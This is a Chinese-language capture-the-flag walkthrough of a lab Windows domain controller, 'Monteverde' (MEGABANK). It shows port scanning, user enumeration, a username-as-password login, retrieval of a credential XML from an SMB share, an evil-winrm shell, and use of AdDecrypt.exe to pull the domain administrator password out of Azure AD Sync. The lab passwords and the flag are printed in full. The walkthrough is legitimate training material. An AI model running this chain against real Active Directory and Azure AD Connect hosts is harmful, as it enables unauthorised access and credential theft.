概述
这个box相对来讲比较直接,没有太多弯弯绕绕,从端口扫描可以判断目标是一台windows主机,没有对外开暴露什么服务,尝试通过smb/445端口突破。先用enum4linux尝试枚举信息,可以看到一些域账号信息,其中一个账号使用了弱口令,利用该账号配合smbclient从共享目录中找到另一个账号的凭据,进而使用evil-winrm获取到shell。之后观察目标主机上运行的服务,发现有一个Microsoft Azure AD Sync的服务,然后google发现对该服务的一个提权漏洞进而获取到administrator
端口扫描
root@kali-202001b-test:~# nmap -sC -sV 10.10.10.172
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 03:55 EDT
Nmap scan report for 10.10.10.172
Host is up (0.34s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-11 07:09:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -47m04s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-11T07:11:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 326.15 seconds
看到目标机器是一个windows机器,开放了445端口,并且域名是MEGABANK
使用enum4linux枚举信息:
root@kali-202001b-test:~# enum4linux 10.10.10.172
···
=============================
| Users on 10.10.10.172 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
···
enum4linux complete on Thu Jun 11 04:14:08 2020
从枚举结果里可以看到一些账号,尝试使用crackmapexec或hydra配合一些简单的弱口令爆破,但是并没有撞到正确的,后来看论坛大佬的提示,说管理员很懒云云,于是推测密码就是账号,所以简单尝试一下发现可用的账号密码是SABatchJobs: SABatchJobs
落脚点
尝试用evil-winrm配合SABatchJobs登录,结果登录失败,推测这个账号的权限不够,尝试用smbclient查看共享目录:
root@vultr:~# smbclient -L 10.10.10.172 -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
查看敏感文件:
root@vultr:~# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (45.5 KiloBytes/sec) (average 45.5 KiloBytes/sec)
查看文件azure.xml内容,看到里面有一串密码4n0therD4y@n0th3r$
root@vultr:~# cat azure.xml
▒▒<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
然后用smbclient同样的方式尝试,发现这个密码属于mhope账号,mhope:4n0therD4y@n0th3r$
接下来用evil-winrm获取一个shell,拿到user.txt
root@vultr:~# evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope
*Evil-WinRM* PS C:\Users\mhope\Documents> type ../desktop/user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents>
提权
在mhope的家目录下看到有一个.Azure目录,看起来像是使用了Azure的某些服务,但是这些没什么乱用,后来根据论坛大佬的提示,在C:\Program Files看到目标机器有安装Microsoft Azure AD Sync,google说这个服务是用来同步本地的AD凭据到云上的
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:31 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShell
这篇文章描述了如何通过获取Azure AD Sync的配置并且解密账号同步服务配置的密码,根据文章的描述,Azure AD Sync的配置保存在一个本地的MS SQL数据里
于是我们直接下载PoC里面已经编译好的PE文件AdDecrypt.exe,上传到主机,并根据文章中的说明执行
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\BIn> C:\Users\mhope\AdDecrypt.exe -FullSql
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
获取到域管理员账号密码administrator:d0m@in4dminyeah!,最后只用admin账号登录拿到root
